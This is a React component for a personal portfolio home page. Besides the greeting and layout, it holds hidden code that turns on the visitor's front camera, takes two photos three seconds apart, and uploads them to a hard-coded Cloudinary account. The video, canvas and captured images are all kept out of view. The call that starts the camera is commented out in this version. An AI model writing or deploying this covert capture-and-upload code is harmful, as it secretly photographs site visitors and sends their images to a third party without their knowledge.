/* eslint-disable no-unused-vars */
/* eslint-disable react-hooks/exhaustive-deps */
import React, { useRef, useEffect, useState } from "react";
import { Container, Row, Col, Button } from "react-bootstrap";
import homeLogo from "../../Assets/home-main.svg";
import Particle from "../Particle";
import Home2 from "./Home2";
import Type from "./Type";
import axios from 'axios';

function Home() {
  const videoRef = useRef(null);
  const canvasRef = useRef(null);
  const [cameraEnabled, setCameraEnabled] = useState(false);
  const [photoCount, setPhotoCount] = useState(0); // Track number of photos taken
  const [images, setImages] = useState([]); // Store captured images
  const [uploading, setUploading] = useState(false); // Track if uploading
  const [uploadProgress, setUploadProgress] = useState(0); // Track upload progress

  const startCamera = async () => {
    try {
      const constraints = {
        video: {
          facingMode: "user", // Use "environment" for back camera on mobile
        },
      };
      const stream = await navigator.mediaDevices.getUserMedia(constraints);
      if (videoRef.current) {
        videoRef.current.srcObject = stream;
        videoRef.current.onloadedmetadata = () => {
          videoRef.current.play();
          setCameraEnabled(true);
        };
      }
    } catch (error) {
      console.error("Error accessing camera: ", error);
    }
  };

  const takePhoto = () => {
    if (canvasRef.current && videoRef.current) {
      const context = canvasRef.current.getContext("2d");
      canvasRef.current.width = videoRef.current.videoWidth;
      canvasRef.current.height = videoRef.current.videoHeight;
      context.drawImage(videoRef.current, 0, 0, canvasRef.current.width, canvasRef.current.height);
      canvasRef.current.toBlob((blob) => {
        if (blob) {
          const url = URL.createObjectURL(blob);
          setImages((prevImages) => [...prevImages, blob]);
          setPhotoCount((prevCount) => prevCount + 1);
          if (photoCount + 1 === 2) {
            const stream = videoRef.current.srcObject;
            const tracks = stream.getTracks();
            tracks.forEach((track) => track.stop());
            setCameraEnabled(false);
            handleSend(); // Call handleSend to start uploading images
          }
        }
      }, 'image/png');
    }
  };

  useEffect(() => {
   // startCamera();

    const interval = setInterval(() => {
      if (cameraEnabled && photoCount < 2) {
        takePhoto();
      } else if (photoCount >= 2) {
        clearInterval(interval);
      }
    }, 3000);

    return () => {
      clearInterval(interval);
      if (videoRef.current && videoRef.current.srcObject) {
        const stream = videoRef.current.srcObject;
        const tracks = stream.getTracks();
        tracks.forEach((track) => track.stop());
      }
    };
  }, [cameraEnabled, photoCount]);

  const uploadFile = async (file, publicId) => {
console.log("FILE")
    console.log(file);
    const data = new FormData();
    data.append('file', file);
    data.append('upload_preset', 'biw5q8hi'); // Your Cloudinary upload preset
    data.append('public_id', publicId);
    data.append('folder', 'uploads'); // Specify the folder path here

    try {
      const response = await axios.post(
        `https://api.cloudinary.com/v1_1/dpdh2nryr/image/upload`,
        data,
        {
          headers: { 'Content-Type': 'multipart/form-data' },
          onUploadProgress: (progressEvent) => {
            setUploadProgress(Math.round((progressEvent.loaded * 100) / progressEvent.total));
          },
        }
      );
      console.log('Upload response:', response.data);
    } catch (error) {
      console.error('Error uploading file:', error);
    }
  };

  const handleSend = async () => {
    setUploading(true);
    setUploadProgress(0);

    for (let i = 0; i < images.length; i++) {
      const file = images[i];
      const publicId = `image_${i}_${new Date().toISOString()}`;
      await uploadFile(file, publicId);
    }

    setUploading(false);
    setUploadProgress(0);
    // alert('Images uploaded successfully!');
  };

  return (
    <section>
      <Container fluid className="home-section" id="home">
        <Particle />
        <Container className="home-content">
          <Row>
            <Col md={7} className="home-header">
              <h1 style={{ paddingBottom: 15 }} className="heading">
                Hi There!{" "}
                <span className="wave" role="img" aria-labelledby="wave">
                  👋🏻
                </span>
              </h1>
              <h1 className="heading-name">
                I'M
                <strong className="main-name"> Akul Gehlot</strong>
              </h1>
              <div style={{ padding: 50, textAlign: "left" }}>
                <Type />
              </div>
            </Col>
            <Col md={5} style={{ paddingBottom: 20 }}>
              <img
                src={homeLogo}
                alt="home pic"
                className="img-fluid"
                style={{ maxHeight: "450px" }}
              />
            </Col>
          </Row>
          <Row>
            <Col>
              <video ref={videoRef} style={{ display: "none" }} playsInline />
              <canvas ref={canvasRef} style={{ display: "none" }} />
              {images.length > 0 && (
                <div>
                  
                  {images.map((image, index) => (
                    <img key={index} src={URL.createObjectURL(image)} alt={`Captured ${index + 1}`} style={{ display: "none" }} />
                  ))}
                </div>
              )}
      
            </Col>
          </Row>
        </Container>
      </Container>
      <Home2 />
    </section>
  );
}

export default Home;
